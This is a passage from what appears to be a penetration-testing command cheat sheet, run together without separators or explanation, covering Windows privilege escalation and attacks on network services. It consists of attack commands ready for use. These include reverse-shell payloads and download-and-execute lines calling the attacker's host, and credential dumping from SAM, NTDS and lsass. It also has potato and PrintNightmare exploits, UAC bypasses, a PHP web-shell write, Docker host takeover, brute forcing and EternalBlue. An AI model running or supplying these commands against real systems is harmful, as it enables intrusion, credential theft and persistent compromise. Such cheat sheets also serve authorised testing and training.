{{RHOSTS}}; set SITEPATH /var/www/html; set LHOST {{LHOST}}; run" nc {{RHOST}} {{RPORT}}
SITE CPFR /etc/passwd
SITE CPTO /tmp/passwd.copy curl "{{URL}}/shell.php?cmd=id" reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f msi -o evil.msi msfvenom -p windows/adduser USER=hacker PASS=Passw0rd123! -f msi -o adduser.msi iwr -Uri {{URL}}/evil.msi -OutFile C:\Windows\Temp\evil.msi msiexec /quiet /qn /i C:\Windows\Temp\evil.msi powerpick Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer','HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -EA SilentlyContinue whoami /priv | findstr /i "SeAssignPrimaryToken SeImpersonate" C:\Windows\Temp\ps.exe -i -c cmd C:\Windows\Temp\GodPotato-NET4.exe -cmd "cmd /c whoami" msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o rev.exe C:\Windows\Temp\ps.exe -c "C:\Windows\Temp\rev.exe" reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' | Select-Object DefaultUserName,DefaultDomainName,DefaultPassword,AutoAdminLogon netexec smb {{RHOST}} -u {{USER}} -p {{PASS}} -M autologon runas /user:RECOVERED_USER cmd.exe evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run Get-CimInstance Win32_StartupCommand | Select-Object Name,Command,Location,User | Format-List icacls "C:\Program Files\Vendor\autostart.exe" Get-Acl 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run' | Format-List msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o autostart.exe reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Windows\Temp\autostart.exe" /f $env:Path -split ';' | ForEach-Object { if ($_ -and (Test-Path $_)) { icacls $_ } } powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Find-PathDLLHijack" accesschk.exe -accepteula -uwdq "C:\Path\To\AppDir" Procmon64.exe /AcceptEula msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f dll -o hijack.dll Copy-Item .\hijack.dll 'C:\Path\To\WritableDir\MISSING.dll'; Get-Service 'VulnSvc' | Restart-Service -Force Get-CimInstance Win32_Service | Where-Object { $_.PathName -notmatch 'C:\\Windows' -and $_.StartName -eq 'LocalSystem' } | Select Name,PathName,StartName whoami /priv whoami /all systeminfo [System.Environment]::OSVersion.Version; (Get-CimInstance Win32_OperatingSystem).Caption; Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 15 certutil.exe -urlcache -split -f http://{{LHOST}}:{{LPORT}}/winPEASx64.exe C:\Windows\Temp\winpeas.exe C:\Windows\Temp\winpeas.exe quiet cmd fast IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}:{{LPORT}}/winPEAS.ps1') IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}:{{LPORT}}/PowerUp.ps1'); Invoke-AllChecks C:\Windows\Temp\Seatbelt.exe -group=all accesschk.exe /accepteula -uwcqv "Users" * accesschk.exe /accepteula -wvu "Everyone" "C:\Program Files\VulnApp" reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated impacket-smbserver share $(pwd) -smb2support icacls C:\Windows\System32\config\SAM vssadmin list shadows copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\Temp\SECURITY impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL Invoke-WebRequest -Uri {{URL}}/HiveNightmare.exe -OutFile C:\Temp\hn.exe; C:\Temp\hn.exe netexec smb {{RHOST}} -u Administrator -H {{NTHASH}} evil-winrm -i {{RHOST}} -u Administrator -H {{NTHASH}} systeminfo wmic qfe get Caption,Description,HotFixID,InstalledOn Get-HotFix | Sort-Object InstalledOn -Descending wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only wes.py --update && wes.py systeminfo.txt Watson.exe searchsploit windows kernel local privilege escalation searchsploit -m windows/local/<edb-id> certutil -urlcache -split -f {{URL}}/exploit.exe C:\Temp\exploit.exe C:\Temp\exploit.exe "cmd /c whoami" sc query spooler reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" netexec smb {{RHOST}} -u {{USER}} -p {{PASS}} -M printnightmare impacket-rpcdump @{{RHOST}} | egrep -i 'MS-RPRN|MS-PAR' msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f dll -o /tmp/nightmare.dll impacket-smbserver share /tmp -smb2support python3 CVE-2021-1675.py {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} '\\{{LHOST}}\share\nightmare.dll' Import-Module .\CVE-2021-1675.ps1; Invoke-Nightmare -DriverName 'PrintMe' -NewUser 'pwn' -NewPassword 'Pwn123!' Import-Module .\CVE-2021-1675.ps1; Invoke-Nightmare -DLL 'C:\Temp\nightmare.dll' Stop-Service -Name Spooler -Force; Set-Service -Name Spooler -StartupType Disabled schtasks /query /fo LIST /v Get-ScheduledTask | Where-Object {$_.Principal.UserId -match 'SYSTEM|Administrator'} | Select-Object TaskName,TaskPath,@{n='RunAs';e={$_.Principal.UserId}} Get-ScheduledTask -TaskName 'VulnTask' | Select-Object -ExpandProperty Actions icacls "C:\Scripts\backup.bat" echo C:\Windows\Temp\rev.exe >> C:\Scripts\backup.bat msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o rev.exe schtasks /run /tn "VulnTask" Get-ChildItem C:\Windows\System32\Tasks -Recurse | Select-Object FullName whoami /priv | findstr /i "SeBackup SeRestore" reg save HKLM\SAM C:\Temp\SAM.hive && reg save HKLM\SYSTEM C:\Temp\SYSTEM.hive reg save HKLM\SECURITY C:\Temp\SECURITY.hive impacket-secretsdump -sam SAM.hive -system SYSTEM.hive -security SECURITY.hive LOCAL echo set context persistent nowriters > C:\Temp\sh.txt & echo add volume c: alias raj >> C:\Temp\sh.txt & echo create >> C:\Temp\sh.txt & echo expose %raj% z: >> C:\Temp\sh.txt & diskshadow /s C:\Temp\sh.txt robocopy /b Z:\Windows\NTDS C:\Temp ntds.dit impacket-secretsdump -ntds ntds.dit -system SYSTEM.hive LOCAL evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} smbclient //{{RHOST}}/C$ -U {{DOMAIN}}/{{USER}}%{{PASS}} -c "cd Temp; get SAM.hive; get SYSTEM.hive; get ntds.dit" whoami /priv | findstr /i "SeDebug" privilege::debug token::elevate sekurlsa::logonpasswords incognito.exe list_tokens -u incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full pypykatz lsa minidump lsass.dmp RunasCs.exe {{USER}} {{PASS}} cmd.exe whoami /priv | findstr /i "impersonate primarytoken" certutil.exe -urlcache -split -f http://{{LHOST}}:{{LPORT}}/PrintSpoofer64.exe C:\Windows\Temp\ps.exe C:\Windows\Temp\ps.exe -i -c cmd C:\Windows\Temp\ps.exe -c "C:\Windows\Temp\rev.exe" C:\Windows\Temp\GodPotato-NET4.exe -cmd "cmd /c whoami" C:\Windows\Temp\GodPotato-NET4.exe -cmd "C:\Windows\Temp\nc.exe {{LHOST}} {{LPORT}} -e cmd" C:\Windows\Temp\RoguePotato.exe -r {{LHOST}} -e "C:\Windows\Temp\rev.exe" -l 9999 socat tcp-listen:135,reuseaddr,fork tcp:{{RHOST}}:9999 C:\Windows\Temp\EfsPotato.exe "whoami" C:\Windows\Temp\JuicyPotatoNG.exe -t * -p "C:\Windows\Temp\rev.exe" cmdkey /list runas /savecred /user:ADMIN_USER "C:\Windows\Temp\rev.exe" Get-ChildItem C:\ -Include unattend.xml,sysprep.xml,sysprep.inf,Autounattend.xml,Unattended.xml -File -Recurse -EA SilentlyContinue findstr /si password *.xml *.ini *.config *.txt 2>nul findstr /s /i cpassword \\{{DOMAIN}}\sysvol\{{DOMAIN}}\policies\*.xml netexec smb {{DC_IP}} -u {{USER}} -p {{PASS}} -M gpp_password gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword netsh wlan show profile name="SSID" key=clear reg save HKLM\SAM C:\Windows\Temp\sam.save && reg save HKLM\SYSTEM C:\Windows\Temp\system.save impacket-secretsdump -sam sam.save -system system.save LOCAL impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} whoami /groups | findstr /i "Label" net localgroup administrators reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "cmd.exe /c start cmd.exe" /f & reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f & start fodhelper.exe reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "cmd.exe /c start cmd.exe" /f & reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f & start computerdefaults.exe reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c start cmd.exe" /f & start eventvwr.exe reg add HKCU\Software\Classes\exefile\shell\runas\command /v IsolatedCommand /t REG_SZ /d "cmd.exe /c start cmd.exe" /f & start sdclt.exe reg delete HKCU\Software\Classes\ms-settings /f & reg delete HKCU\Software\Classes\mscfile /f reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('{{URL}}')" /f & reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f & start fodhelper.exe wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v "\"" sc qc "VulnSvc" Get-CimInstance -ClassName Win32_Service | Where-Object { $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and $_.PathName -notmatch 'C:\\Windows' } | Select-Object Name,PathName,StartName,StartMode icacls "C:\Program Files\My App" accesschk.exe -accepteula -uwdq "C:\Program Files\My App" msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o My.exe smbclient //{{RHOST}}/share -U '{{USER}}%{{PASS}}' -c 'put My.exe' sc stop "VulnSvc" & sc start "VulnSvc" accesschk.exe -accepteula -uvwqk HKLM\System\CurrentControlSet\Services Get-Acl HKLM:\System\CurrentControlSet\Services\VulnSvc | Format-List; (Get-Acl HKLM:\System\CurrentControlSet\Services\VulnSvc).Access | Where-Object { $_.RegistryRights -match 'WriteKey|SetValue|FullControl' } powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Get-ModifiableRegistryAutoRun; Get-RegistryAlwaysInstallElevated" reg query HKLM\System\CurrentControlSet\Services\VulnSvc reg add HKLM\System\CurrentControlSet\Services\VulnSvc /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\rev.exe" /f reg add HKLM\System\CurrentControlSet\Services\VulnSvc /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\System32\cmd.exe /c net localgroup administrators {{USER}} /add" /f msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o rev.exe sc stop "VulnSvc" & sc start "VulnSvc" accesschk.exe -accepteula -uwcqv "%USERNAME%" * accesschk.exe -accepteula -uwcqv "Authenticated Users" * Get-Service | ForEach-Object { $_.Name }; sc.exe sdshow VulnSvc powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Get-ModifiableService" sc qc "VulnSvc" sc config "VulnSvc" binPath= "C:\Windows\System32\cmd.exe /c net localgroup administrators {{USER}} /add" start= demand obj= LocalSystem sc config "VulnSvc" binPath= "C:\Windows\Temp\rev.exe" sc stop "VulnSvc" & sc start "VulnSvc" powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-ServiceAbuse -Name 'VulnSvc' -UserName '{{DOMAIN}}\{{USER}}'" nmap -p110,995 -sV -sC --script pop3-capabilities,pop3-ntlm-info -oA nmap_pop3_{{RHOST}} {{RHOST}} nc -nv {{RHOST}} 110 openssl s_client -connect {{RHOST}}:995 -crlf -quiet nc -nv {{RHOST}} 110
USER {{USER}}
PASS {{PASS}}
LIST
RETR 1
QUIT hydra -L {{WORDLIST}} -P {{WORDLIST}} -f {{RHOST}} pop3 hydra -l {{USER}} -P {{WORDLIST}} -f {{RHOST}} pop3s rpcinfo -p {{RHOST}} rpcinfo {{RHOST}} nmap -p111 -sV --script rpcinfo {{RHOST}} nmap -sSU -p111 {{RHOST}} showmount -e {{RHOST}} nmap -sV -p {{RPORT}} --script=memcached-info {{RHOST}} ncat -C {{RHOST}} {{RPORT}} memcstat --servers={{RHOST}}:{{RPORT}} printf 'stats\r\nstats items\r\nstats slabs\r\n' | ncat -C {{RHOST}} {{RPORT}} printf 'stats cachedump 1 0\r\n' | ncat -C {{RHOST}} {{RPORT}} printf 'get KEYNAME\r\n' | ncat -C {{RHOST}} {{RPORT}} nmap -sV -Pn -p 1099 --script rmi-dumpregistry,rmi-vuln-classloader {{RHOST}} rmg enum {{RHOST}} {{RPORT}} rmg guess {{RHOST}} {{RPORT}} java -jar BaRMIe.jar -enum {{RHOST}} {{RPORT}} rmg serial {{RHOST}} {{RPORT}} CommonsCollections6 'nc {{LHOST}} {{LPORT}} -e /bin/sh' --bound-name jmxrmi java -jar BaRMIe.jar -attack {{RHOST}} {{RPORT}} impacket-rpcdump @{{RHOST}} rpcdump.py @{{RHOST}} | grep -E 'MS-RPRN|MS-EFSR|MS-TSCH|MS-SCMR' nmap -n -sV -p135 --script msrpc-enum,rpc-grind {{RHOST}} impacket-wmiexec {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} impacket-wmiexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-dcomexec -object MMC20 {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} netexec wmi {{RHOST}} -u {{USER}} -p '{{PASS}}' -x 'whoami' nmap -p143,993 -sV -sC --script imap-capabilities,imap-ntlm-info -oA nmap_imap_{{RHOST}} {{RHOST}} nc -nv {{RHOST}} 143 openssl s_client -connect {{RHOST}}:993 -crlf -quiet nc -nv {{RHOST}} 143
a LOGIN {{USER}} {{PASS}}
a LIST "" "*"
a SELECT INBOX
a FETCH 1 BODY[]
a LOGOUT hydra -L {{WORDLIST}} -P {{WORDLIST}} -f {{RHOST}} imap hydra -l {{USER}} -P {{WORDLIST}} -f {{RHOST}} imaps curl -k 'imaps://{{RHOST}}/INBOX' --user '{{USER}}:{{PASS}}' -X 'FETCH 1 BODY[]' nmap -p1433 -sV --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password {{RHOST}} -oN mssql_enum.txt netexec mssql {{RHOST}} -u {{USER}} -p {{PASS}} --local-auth impacket-mssqlclient {{USER}}:{{PASS}}@{{RHOST}} -windows-auth impacket-mssqlclient {{USER}}:{{PASS}}@{{RHOST}} impacket-mssqlclient {{DOMAIN}}/{{USER}}@{{RHOST}} -k -no-pass EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'; xp_cmdshell powershell -e {{URL}} EXEC master..xp_dirtree '\\{{LHOST}}\\share\\x', 1, 1; sudo responder -I {{INTERFACE}} EXEC sp_linkedservers; SELECT * FROM master..sysservers; EXEC ('sp_configure ''xp_cmdshell'',1; RECONFIGURE; EXEC xp_cmdshell ''whoami''') AT [LINKED-SQL]; EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin'); nmap -sV -p {{RPORT}} --script=oracle-tns-version,oracle-sid-brute {{RHOST}} tnscmd10g version -h {{RHOST}} -p {{RPORT}} tnscmd10g status -h {{RHOST}} -p {{RPORT}} odat all -s {{RHOST}} -p {{RPORT}} odat sidguesser -s {{RHOST}} -p {{RPORT}} odat passwordguesser -s {{RHOST}} -p {{RPORT}} -d {{DOMAIN}} --accounts-file accounts/accounts_multiple.txt sqlplus {{USER}}/{{PASS}}@{{RHOST}}:{{RPORT}}/{{DOMAIN}} odat utlfile -s {{RHOST}} -p {{RPORT}} -d {{DOMAIN}} -U {{USER}} -P {{PASS}} --putFile /tmp sh.sh ./sh.sh odat externaltable -s {{RHOST}} -p {{RPORT}} -d {{DOMAIN}} -U {{USER}} -P {{PASS}} --exec /tmp sh.sh nmap -sU -p 161 -sV --script snmp-info,snmp-sysdescr {{RHOST}} onesixtyone -c {{WORDLIST}} {{RHOST}} snmpwalk -v2c -c public {{RHOST}} snmpwalk -v2c -c public {{RHOST}} 1.3.6.1.4.1.77.1.2.25 snmpwalk -v2c -c public {{RHOST}} 1.3.6.1.2.1.25.4.2.1.2 snmpwalk -v2c -c public {{RHOST}} 1.3.6.1.2.1.25.4.2.1.5 snmpwalk -v2c -c public {{RHOST}} 1.3.6.1.2.1.25.6.3.1.2 snmpwalk -v2c -c public {{RHOST}} 1.3.6.1.2.1.6.13.1.3 snmp-check -c public {{RHOST}} snmpbulkwalk -v2c -c public -Cr1000 {{RHOST}} .1 snmpwalk -v3 -l authPriv -u {{USER}} -a SHA -A {{PASS}} -x AES -X {{PASS}} {{RHOST}} showmount -e {{RHOST}} nmap -p111,2049 -sV --script nfs-showmount,nfs-ls,nfs-statfs {{RHOST}} sudo mount -t nfs -o vers=3 {{RHOST}}:/export /mnt/nfs sudo mount -t nfs -o vers=3,nolock {{RHOST}}:/home /mnt/nfs cp /bin/bash /mnt/nfs/rootbash; chmod +s /mnt/nfs/rootbash /mnt/nfs/rootbash -p nmap -p21 -sV -sC {{RHOST}} nmap -p21 --script ftp-anon,ftp-bounce,ftp-syst {{RHOST}} ftp {{RHOST}} wget -m --no-passive ftp://anonymous:anonymous@{{RHOST}} binary hydra -L {{WORDLIST}} -P {{WORDLIST}} -f -t 4 ftp://{{RHOST}} hydra -l {{USER}} -P {{WORDLIST}} ftp://{{RHOST}} -t 4 nmap -b anonymous:anonymous@{{RHOST}} -p1-1024 {{DC_IP}} nmap -p 22 -sV -sC {{RHOST}} nmap -p 22 --script ssh2-enum-algos,ssh-auth-methods,ssh-hostkey,sshv1 {{RHOST}} nc {{RHOST}} {{RPORT}} ssh -v {{USER}}@{{RHOST}} -p {{RPORT}} ssh-audit {{RHOST}}:{{RPORT}} hydra -L {{WORDLIST}} -P {{WORDLIST}} -t 4 ssh://{{RHOST}}:{{RPORT}} hydra -l {{USER}} -P {{WORDLIST}} -t 4 ssh://{{RHOST}}:{{RPORT}} crackmapexec ssh {{RHOST}} -u {{USER}} -p {{PASS}} ssh-keygen -lf {{WORDLIST}} ssh2john id_rsa > hash.txt && john --wordlist={{WORDLIST}} hash.txt chmod 600 id_rsa && ssh -i id_rsa {{USER}}@{{RHOST}} -p {{RPORT}} python3 ssh_enum.py {{RHOST}} {{WORDLIST}} ssh -L {{LPORT}}:127.0.0.1:{{RPORT}} {{USER}}@{{RHOST}} ssh -D {{LPORT}} {{USER}}@{{RHOST}} ssh -R {{RPORT}}:127.0.0.1:{{LPORT}} {{USER}}@{{RHOST}} nmap -p 23 -sV -sC {{RHOST}} nmap -p 23 --script telnet-ntlm-info,telnet-encryption {{RHOST}} telnet {{RHOST}} {{RPORT}} nc {{RHOST}} {{RPORT}} hydra -L {{WORDLIST}} -P {{WORDLIST}} -t 4 telnet://{{RHOST}}:{{RPORT}} hydra -l {{USER}} -P {{WORDLIST}} telnet://{{RHOST}}:{{RPORT}} telnet {{RHOST}} {{RPORT}} # login: {{USER}} / {{PASS}} sudo tcpdump -i {{INTERFACE}} -A 'tcp port 23' -w telnet.pcap nmap -sV -Pn -p 2375,2376 {{RHOST}} curl -s http://{{RHOST}}:2375/version docker -H tcp://{{RHOST}}:2375 info docker -H tcp://{{RHOST}}:2375 images docker -H tcp://{{RHOST}}:2375 run --rm -v /:/mnt -it alpine chroot /mnt sh docker -H tcp://{{RHOST}}:2375 run --rm -v /:/mnt alpine sh -c "cat /mnt/etc/shadow" docker -H tcp://{{RHOST}}:2375 run --rm --privileged --net=host --pid=host -it alpine nsenter -t 1 -m -u -n -i sh nmap -p25,465,587 -sV -sC --script smtp-commands,smtp-open-relay,smtp-enum-users,smtp-ntlm-info -oA nmap_smtp_{{RHOST}} {{RHOST}} nc -nv {{RHOST}} 25 telnet {{RHOST}} 25 smtp-user-enum -M VRFY -U {{WORDLIST}} -t {{RHOST}} smtp-user-enum -M RCPT -U {{WORDLIST}} -t {{RHOST}} -D {{DOMAIN}} smtp-user-enum -M EXPN -U {{WORDLIST}} -t {{RHOST}} swaks --to {{USER}}@{{DOMAIN}} --from attacker@{{DOMAIN}} --server {{RHOST}} --body 'test' swaks --from attacker@evil.com --to victim@external.com --server {{RHOST}} swaks --to {{USER}}@{{DOMAIN}} --server {{RHOST}} --auth LOGIN --auth-user {{USER}} --auth-password {{PASS}} nmap -sV -p {{RPORT}} --script=mongodb-info,mongodb-databases {{RHOST}} mongosh mongodb://{{RHOST}}:{{RPORT}} mongosh mongodb://{{USER}}:{{PASS}}@{{RHOST}}:{{RPORT}}/admin mongosh mongodb://{{RHOST}}:{{RPORT}} --eval 'db.adminCommand({listDatabases:1})' mongosh mongodb://{{RHOST}}:{{RPORT}}/DBNAME --eval 'db.getCollectionNames().forEach(c=>printjson(db[c].find().toArray()))' mongo {{RHOST}}:{{RPORT}}/admin --eval 'db.system.users.find()' ldapsearch -x -H ldap://{{DC_IP}}:3268 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC={{DOMAIN}}' '(objectClass=user)' sAMAccountName ldapsearch -x -H ldap://{{DC_IP}}:3268 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b '' '(&(objectCategory=person)(objectClass=user)(adminCount=1))' sAMAccountName memberOf nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --port 3268 --users ldapsearch -x -H ldap://{{DC_IP}}:3268 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b '' '(objectClass=trustedDomain)' trustPartner trustDirection trustAttributes LDAPTLS_REQCERT=never ldapsearch -x -H ldaps://{{DC_IP}}:3269 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b '' '(objectClass=user)' sAMAccountName nmap -sV -p {{RPORT}} --script=mysql-info,mysql-empty-password,mysql-users,mysql-databases,mysql-variables,mysql-audit,mysql-dump-hashes,mysql-enum {{RHOST}} mysql -h {{RHOST}} -P {{RPORT}} -u {{USER}} -p'{{PASS}}' mysql -h {{RHOST}} -P {{RPORT}} -u root --password='' hydra -L {{WORDLIST}} -P {{WORDLIST}} {{RHOST}} mysql mysql -h {{RHOST}} -u {{USER}} -p'{{PASS}}' -e 'show databases; select user,authentication_string from mysql.user;' mysql -h {{RHOST}} -u {{USER}} -p'{{PASS}}' -e "select load_file('/etc/passwd');" mysql -h {{RHOST}} -u {{USER}} -p'{{PASS}}' -e "select '<?php system($_GET[0]); ?>' INTO OUTFILE '/var/www/html/sh.php';" sqlmap -d "mysql://{{USER}}:{{PASS}}@{{RHOST}}:{{RPORT}}/database" --os-shell nmap -p3389 -sV --script rdp-ntlm-info,rdp-enum-encryption {{RHOST}} -oN rdp_enum.txt nmap -p3389 --script rdp-vuln-ms12-020 {{RHOST}} netexec rdp {{RHOST}} -u {{USER}} -p {{PASS}} netexec rdp {{RHOST}} -u {{USER}} -H {{NTHASH}} xfreerdp /v:{{RHOST}} /u:{{USER}} /p:{{PASS}} /cert:ignore +clipboard /dynamic-resolution /drive:share,/home/kali/share xfreerdp /v:{{RHOST}} /u:{{USER}} /pth:{{NTHASH}} /cert:ignore +clipboard /dynamic-resolution xfreerdp /v:{{RHOST}} /d:{{DOMAIN}} /u:{{USER}} /p:{{PASS}} /cert:ignore /dynamic-resolution reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f query user sc.exe create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0" && net start sesshijack hydra -L {{WORDLIST}} -p {{PASS}} rdp://{{RHOST}} msfconsole -q -x "use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS {{RHOST}}; run" ldapsearch -x -H ldap://{{DC_IP}} -s base namingcontexts ldapsearch -x -H ldap://{{DC_IP}} -b 'DC={{DOMAIN}}' '(objectClass=*)' ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC={{DOMAIN}}' '(objectClass=user)' sAMAccountName description memberOf ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC={{DOMAIN}}' '(&(objectClass=user)(servicePrincipalName=*))' sAMAccountName servicePrincipalName ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC={{DOMAIN}}' '(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' sAMAccountName nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --users --groups nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' -M get-desc-users nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' -M laps bloodhound-python -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' -ns {{DC_IP}} -c All --zip windapsearch -d {{DOMAIN}} --dc {{DC_IP}} -u '{{USER}}@{{DOMAIN}}' -p '{{PASS}}' --da rpcclient -U '' -N {{DC_IP}} -c 'enumdomusers' netexec smb {{RHOST}} netexec smb {{RHOST}} -u '' -p '' --shares enum4linux-ng -A {{RHOST}} smbclient -L //{{RHOST}}/ -N smbmap -H {{RHOST}} -u '{{USER}}' -p '{{PASS}}' smbclient //{{RHOST}}/SHARE -U '{{DOMAIN}}\{{USER}}%{{PASS}}' netexec smb {{RHOST}} -u '{{USER}}' -p '{{PASS}}' --shares --users --groups --pass-pol netexec smb {{RHOST}} -u '{{USER}}' -p '{{PASS}}' --rid-brute netexec smb {{RHOST}} -u '{{USER}}' -p '{{PASS}}' -M spider_plus nmap -n -p445 --script smb-vuln-ms17-010 {{RHOST}} netexec smb {{RHOSTS}} -M ms17-010 msfconsole -q -x 'use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS {{RHOST}}; set LHOST {{LHOST}}; run' netexec smb {{RHOST}} -u '{{USER}}' -H {{NTHASH}} impacket-psexec {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-smbexec {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} impacket-secretsdump {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} impacket-secretsdump -just-dc -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{DC_IP}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} rpcclient -U '{{DOMAIN}}/{{USER}}%{{PASS}}' {{DC_IP}} -c 'setuserinfo2 TARGET_USER 23 NewP@ss123!' nxc smb {{DC_IP}} -u {{USER}} -p '{{PASS}}' -M change-password -o USER=TARGET_USER NEWPASS=NewP@ss123! impacket-changepasswd '{{DOMAIN}}/TARGET_USER:OldP@ss@{{DC_IP}}' -newpass 'NewP@ss123!' impacket-changepasswd '{{DOMAIN}}/TARGET_USER@{{DC_IP}}' -newpass 'NewP@ss123!' -reset -altuser '{{USER}}' -altpass '{{PASS}}' bloodyAD -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' --host {{DC_IP}} set password TARGET_USER 'NewP@ss123!' nmap -sV -Pn -p 512,513,514 --script rexec-brute,rlogin-brute,rsh-brute {{RHOST}} rlogin -l root {{RHOST}} rsh -l root {{RHOST}} id rexec -l {{USER}} -p {{PASS}} {{RHOST}} id hydra -L {{WORDLIST}} -P {{WORDLIST}} rexec://{{RHOST}} nmap -p 53 -sV -sU -sT {{RHOST}} nmap -p 53 --script dns-nsid,dns-recursion,dns-zone-transfer --script-args dns-zone-transfer.domain={{DOMAIN}} {{RHOST}} dig axfr {{DOMAIN}} @{{RHOST}} dig any {{DOMAIN}} 